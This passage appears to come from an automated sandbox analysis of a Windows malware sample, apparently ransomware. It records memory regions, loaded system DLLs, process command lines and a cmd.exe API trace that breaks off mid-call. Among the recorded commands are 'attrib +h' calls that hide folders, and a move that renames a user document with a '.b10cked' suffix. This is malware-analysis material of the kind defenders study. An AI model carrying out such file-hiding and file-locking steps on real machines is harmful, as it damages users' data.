0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 14298 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14299 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14300 start_va = 0x70000 end_va = 0x7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 14301 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14302 start_va = 0x1c0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 14303 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 14304 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14305 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 14306 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 14307 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14308 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 14309 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14310 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14311 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 14312 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 14313 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14314 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 14315 start_va = 0x2c0000 end_va = 0x387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 14316 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 14317 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 201 os_tid = 0xd74 Process: id = "145" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea168a0" os_pid = "0xd24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "143" os_parent_pid = "0xcb0" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14318 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14319 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14320 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14321 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 14322 start_va = 0xb50000 end_va = 0xb56fff entry_point = 0xb50000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 14323 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14324 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14325 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14326 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 14327 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 14328 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14329 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14330 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14331 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 14332 start_va = 0x4a0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 14333 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 14334 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14335 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 14336 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 14337 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14338 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 14339 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14340 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14341 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 14342 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 14343 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14344 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 14345 start_va = 0x140000 end_va = 0x207fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 14346 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 14347 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 202 os_tid = 0xd28 Process: id = "146" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea168a0" os_pid = "0xd14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "143" os_parent_pid = "0xcb0" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14348 start_va = 0x10000 end_va = 0x13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14349 start_va = 0x20000 end_va = 0x26fff entry_point = 0x20000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 14350 start_va = 0x30000 end_va = 0x4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 14351 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 14352 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 14353 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14354 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14355 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14356 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 14357 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 14358 start_va = 0x30000 end_va = 0x3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14359 start_va = 0x40000 end_va = 0x4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14360 start_va = 0x60000 end_va = 0xc6fff entry_point = 0x60000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14361 start_va = 0x140000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 14362 start_va = 0x280000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 14363 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 14364 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14365 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 14366 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 14367 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14368 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 14369 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14370 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14371 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 14372 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 14373 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14374 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 14375 start_va = 0x290000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 14376 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 14377 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 203 os_tid = 0xd10 Process: id = "147" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea169a0" os_pid = "0xcf0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UZYEGR~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UzyEGr8akjufgS.doc.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14491 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14492 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14493 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14494 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 14495 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14496 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14497 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14498 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14499 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 14500 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15266 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15267 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15268 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15269 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 15270 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 15271 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15272 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15273 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15274 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15275 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15276 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15277 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15278 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15279 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15300 start_va = 0x3f0000 end_va = 0x4b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 15301 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15302 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15303 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 15304 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 15305 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 15306 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 15307 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 15308 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 15309 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Thread: id = 204 os_tid = 0xcec [0139.460] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fa5c | out: lpSystemTimeAsFileTime=0x26fa5c*(dwLowDateTime=0x8d0fbac0, dwHighDateTime=0x1d440a9)) [0139.460] GetCurrentProcessId () returned 0xcf0 [0139.460] GetCurrentThreadId () returned 0xcec [0139.460] GetTickCount () returned 0x2bdb3 [0139.460] QueryPerformanceCounter (in: lpPerformanceCount=0x26fa54 | out: lpPerformanceCount=0x26fa54*=19624928720) returned 1 [0139.461] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0139.461] __set_app_type (_Type=0x1) [0139.461] __p__fmode () returned 0x76b331f4 [0139.461] __p__commode () returned 0x76b331fc [0139.461] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0139.461] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0139.461] GetCurrentThreadId () returned 0xcec [0139.461] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcec) returned 0x38 [0139.461] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0139.461] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0139.461] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.462] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0139.462] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f9ec | out: phkResult=0x26f9ec*=0x0) returned 0x2 [0139.463] VirtualQuery (in: lpAddress=0x26fa23, lpBuffer=0x26f9bc, dwLength=0x1c | out: lpBuffer=0x26f9bc*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0139.463] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f9bc, dwLength=0x1c | out: lpBuffer=0x26f9bc*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0139.463] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f9bc, dwLength=0x1c | out: lpBuffer=0x26f9bc*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0139.463] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f9bc, dwLength=0x1c | out: lpBuffer=0x26f9bc*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0139.463] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f9bc, dwLength=0x1c | out: lpBuffer=0x26f9bc*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x80000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0139.463] GetConsoleOutputCP () returned 0x1b5 [0139.463] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0139.463] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0139.463] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.463] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0139.464] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.464] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0139.465] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.465] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0139.465] _get_osfhandle (_FileHandle=0) returned 0x3 [0139.465] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0139.466] _get_osfhandle (_FileHandle=0) returned 0x3 [0139.466] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0139.478] GetEnvironmentStringsW () returned 0x300250* [0139.478] FreeEnvironmentStringsW (penv=0x300250) returned 1 [0139.479] GetEnvironmentStringsW () returned 0x300250* [0139.479] FreeEnvironmentStringsW (penv=0x300250) returned 1 [0139.479] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e95c | out: phkResult=0x26e95c*=0x40) returned 0x0 [0139.479] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e964, lpData=0x26e968, 